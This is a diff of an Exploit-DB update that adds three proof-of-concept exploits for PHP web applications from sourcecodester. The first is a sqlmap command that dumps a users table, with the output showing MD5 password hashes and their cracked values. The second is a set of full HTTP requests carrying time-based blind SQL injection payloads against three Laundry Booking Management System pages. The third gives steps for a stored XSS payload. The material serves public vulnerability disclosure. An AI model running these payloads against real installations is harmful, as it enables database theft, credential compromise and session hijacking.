DB: 2021-08-21

3 changes to exploits/shellcodes

Laundry Booking Management System 1.0 - 'Multiple' SQL Injection

Online Traffic Offense Management System 1.0 - 'id' SQL Injection (Authenticated)

Laundry Booking Management System 1.0 - 'Multiple' Stored Cross-Site Scripting (XSS)

exploits/php/webapps/50218.txt

@@ -0,0 +1,31 @@
+# Exploit Title: Online Traffic Offense Management System 1.0 - 'id' SQL Injection (Authenticated)
+# Date: 19/08/2021
+# Exploit Author: Justin White
+# Vendor Homepage: https://www.sourcecodester.com
+# Software Link: https://www.sourcecodester.com/php/14909/online-traffic-offense-management-system-php-free-source-code.html
+# Version: 1.0
+# Testeted on: Linux (Ubuntu 20.04) using LAMPP
+
+## SQL Injection
+
+# Vulnerable page
+http://localhost/traffic_offense/admin/?page=drivers/manage_driver&id=
+
+#Vulnerable paramater 
+The id paramater is Vulnerable to sqli
+
+#POC
+going to http://localhost/traffic_offense/admin/?page=drivers/manage_driver&id=4'-- will throw errors on the web page.
+
+Notice: Trying to get property 'num_rows' of non-object in /opt/lampp/htdocs/traffic_offense/admin/drivers/manage_driver.php on line 5
+Notice: Trying to get property 'num_rows' of non-object in /opt/lampp/htdocs/traffic_offense/admin/drivers/manage_driver.php on line 10
+
+Using sqlmap with dump database 
+sqlmap -u "http://localhost/traffic_offense/admin/?page=drivers/manage_driver&id=4" --cookie="PHPSESSIONID=83ccd78474298cd9c3ad3def1f79f2ac" -D traffic_offense_db -T users --dump
+
++----+------+-------------------------------+----------+---------------------------------------------+----------+--------------+---------------------+------------+---------------------+
+| id | type | avatar                        | lastname | password                                    | username | firstname    | date_added          | last_login | date_updated        |
++----+------+-------------------------------+----------+---------------------------------------------+----------+--------------+---------------------+------------+---------------------+
+| 1  | 1    | uploads/1624240500_avatar.png | Admin    | 0192023a7bbd73250516f069df18b500 (admin123) | admin    | Adminstrator | 2021-01-20 14:02:37 | NULL       | 2021-06-21 09:55:07 |
+| 9  | 2    | uploads/1629336240_avatar.jpg | Smith    | 202cb962ac59075b964b07152d234b70 (123)      | jsmith1  | John         | 2021-08-19 09:24:25 | NULL       | 2021-08-19 19:14:58 |
++----+------+-------------------------------+----------+---------------------------------------------+----------+--------------+---------------------+------------+---------------------+

exploits/php/webapps/50219.txt

@@ -0,0 +1,95 @@
+# Exploit Title: Laundry Booking Management System 1.0 - 'Multiple' SQL Injection
+# Date: 2021-08-19
+# Exploit Author: Azumah Foresight Xorlali
+# Vendor Homepage: https://www.sourcecodester.com/php/14400/laundry-booking-management-system-php-source-code.html
+# Software Link: https://www.sourcecodester.com/download-code?nid=14400&title=Laundry+Booking+Management+System+in+PHP+with+Free+Source+Code
+# Version: Version 1.0
+# Category: Web Application
+# Tested on: Kali Linux
+
+Description:
+Laundry Booking Management System 1.0 application is vulnerable to SQL
+injection via the "id" parameter, which was not properly checked on the
+[edit_user.php,edit_customer.php,edit_order.php] page.
+
+#Vulnerable Request when logged in as a user with Supervisor or Manager:
+POST /laundry_sourcecode/laundry_sourcecode/edit_user.php?id=7 HTTP/1.1
+Host: localhost
+User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:68.0) Gecko/20100101
+Firefox/68.0
+Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
+Accept-Language: en-US,en;q=0.5
+Accept-Encoding: gzip, deflate
+Referer:
+http://localhost/laundry_sourcecode/laundry_sourcecode/edit_user.php?id=7
+Content-Type: multipart/form-data;
+boundary=---------------------------851226474159708868105526498
+Content-Length: 1408
+Connection: close
+Cookie: PHPSESSID=dih37knpkeb9hc1qtk56godb5r
+Upgrade-Insecure-Requests: 1
+
+
+---
+Parameter: id (GET)
+    Type: time-based blind
+    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
+    Payload: id=7' AND (SELECT 5999 FROM (SELECT(SLEEP(5)))BOpa) AND
+'voSh'='voSh
+---
+
+-----------------------------------------------------------------------------------------------------------------------
+
+
+#Vulnerable Request when logged in as Admin:
+POST /laundry_sourcecode/laundry_sourcecode/edit_customer.php?id=1 HTTP/1.1
+Host: localhost
+User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:68.0) Gecko/20100101
+Firefox/68.0
+Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
+Accept-Language: en-US,en;q=0.5
+Accept-Encoding: gzip, deflate
+Referer:
+http://localhost/laundry_sourcecode/laundry_sourcecode/edit_customer.php?id=1
+Content-Type: multipart/form-data;
+boundary=---------------------------17781030011592905058578147050
+Content-Length: 767
+Connection: close
+Cookie: PHPSESSID=dih37knpkeb9hc1qtk56godb5r
+Upgrade-Insecure-Requests: 1
+
+---
+Parameter: id (GET)
+    Type: time-based blind
+    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
+    Payload: id=1' AND (SELECT 6874 FROM (SELECT(SLEEP(5)))ZCjC) AND
+'GIau'='GIau
+---
+
+-----------------------------------------------------------------------------------------------------------------------
+
+#Vulnerable Request when logged in a Admin:
+POST /laundry_sourcecode/laundry_sourcecode/edit_order.php?id=18 HTTP/1.1
+Host: localhost
+User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:68.0) Gecko/20100101
+Firefox/68.0
+Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
+Accept-Language: en-US,en;q=0.5
+Accept-Encoding: gzip, deflate
+Referer:
+http://localhost/laundry_sourcecode/laundry_sourcecode/edit_order.php?id=18
+Content-Type: multipart/form-data;
+boundary=---------------------------167059892515401580571429373524
+Content-Length: 886
+Connection: close
+Cookie: PHPSESSID=dih37knpkeb9hc1qtk56godb5r
+Upgrade-Insecure-Requests: 1
+
+
+---
+Parameter: id (GET)
+    Type: time-based blind
+    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
+    Payload: id=18' AND (SELECT 8201 FROM (SELECT(SLEEP(5)))odDG) AND
+'wCli'='wCli
+---

exploits/php/webapps/50220.txt

@@ -0,0 +1,13 @@
+# Exploit Title: Laundry Booking Management System 1.0 - 'Multiple' Stored Cross-Site Scripting (XSS)
+# Date: 2021-08-19
+# Exploit Author: Azumah Foresight Xorlali
+# Vendor Homepage: https://www.sourcecodester.com/php/14400/laundry-booking-management-system-php-source-code.html
+# Software Link: https://www.sourcecodester.com/download-code?nid=14400&title=Laundry+Booking+Management+System+in+PHP+with+Free+Source+Code
+# Version: Version 1.0
+# Category: Web Application
+# Tested on: Kali Linux
+
+Step1: Log in to the application with any valid user credentials.
+Step2: Select User Management and click add new user.
+Step3: Fill the required details and type "<script>alert(document.domain)</script>" in the address box  or you can it on a notepad and paste it into the firstname and lastname since it doesn't you to type special characters into those fields
+Step 4:Click on  Submit

files_exploits.csv

@@ -38017,6 +38017,7 @@ id,file,description,date,author,type,platform,port
 37352,exploits/php/webapps/37352.txt,"Ignite Solutions CMS - 'car-details.php' SQL Injection",2012-06-03,Am!r,webapps,php,
 37353,exploits/php/webapps/37353.php,"WordPress Plugin Nmedia WordPress Member Conversation 1.35.0 - 'doupload.php' Arbitrary File Upload",2015-06-05,"Sammy FORGIT",webapps,php,
 37248,exploits/php/webapps/37248.txt,"Milw0rm Clone Script 1.0 - 'related.php?program' Blind SQL Injection",2015-06-09,Pancaker,webapps,php,
+50219,exploits/php/webapps/50219.txt,"Laundry Booking Management System 1.0 - 'Multiple' SQL Injection",2021-08-20,"Azumah Foresight Xorlali",webapps,php,
 37237,exploits/hardware/webapps/37237.txt,"D-Link DSL-2780B DLink_1.01.14 - Remote DNS Change",2015-06-08,"Todor Donev",webapps,hardware,
 37238,exploits/hardware/webapps/37238.txt,"TP-Link TD-W8950ND ADSL2+ - Remote DNS Change",2015-06-08,"Todor Donev",webapps,hardware,
 37240,exploits/hardware/webapps/37240.txt,"D-Link DSL-2730B AU_2.01 - Authentication Bypass DNS Change",2015-06-08,"Todor Donev",webapps,hardware,
@@ -44093,6 +44094,7 @@ id,file,description,date,author,type,platform,port
 49849,exploits/php/webapps/49849.txt,"PHP Timeclock 1.04 - Time and Boolean Based Blind SQL Injection",2021-05-07,"Tyler Butler",webapps,php,
 49853,exploits/php/webapps/49853.txt,"PHP Timeclock 1.04 - 'Multiple' Cross Site Scripting (XSS)",2021-05-10,"Tyler Butler",webapps,php,
 49854,exploits/php/webapps/49854.txt,"Human Resource Information System  0.1  - 'First Name' Persistent Cross-Site Scripting (Authenticated)",2021-05-10,"Reza Afsahi",webapps,php,
+50218,exploits/php/webapps/50218.txt,"Online Traffic Offense Management System 1.0 - 'id' SQL Injection (Authenticated)",2021-08-20,"Justin White",webapps,php,
 49856,exploits/php/webapps/49856.py,"Microweber CMS 1.1.20 - Remote Code Execution (Authenticated)",2021-05-10,sl1nki,webapps,php,
 49859,exploits/multiple/webapps/49859.txt,"Chevereto 3.17.1 - Cross Site Scripting (Stored)",2021-05-12,"Akıner Kısa",webapps,multiple,
 49860,exploits/php/webapps/49860.txt,"Dental Clinic Appointment Reservation System 1.0 - Authentication Bypass (SQLi)",2021-05-13,"Mesut Cetin",webapps,php,
@@ -44344,3 +44346,4 @@ id,file,description,date,author,type,platform,port
 50214,exploits/php/webapps/50214.py,"Simple Image Gallery 1.0 - Remote Code Execution (RCE) (Unauthenticated)",2021-08-18,Tagoletta,webapps,php,
 50215,exploits/php/webapps/50215.txt,"COVID19 Testing Management System 1.0 - 'Multiple' SQL Injections",2021-08-18,"Halit AKAYDIN",webapps,php,
 50217,exploits/php/webapps/50217.txt,"Charity Management System CMS 1.0 - Multiple Vulnerabilities",2021-08-19,"Davide Taraschi",webapps,php,
+50220,exploits/php/webapps/50220.txt,"Laundry Booking Management System 1.0 - 'Multiple' Stored Cross-Site Scripting (XSS)",2021-08-20,"Azumah Foresight Xorlali",webapps,php,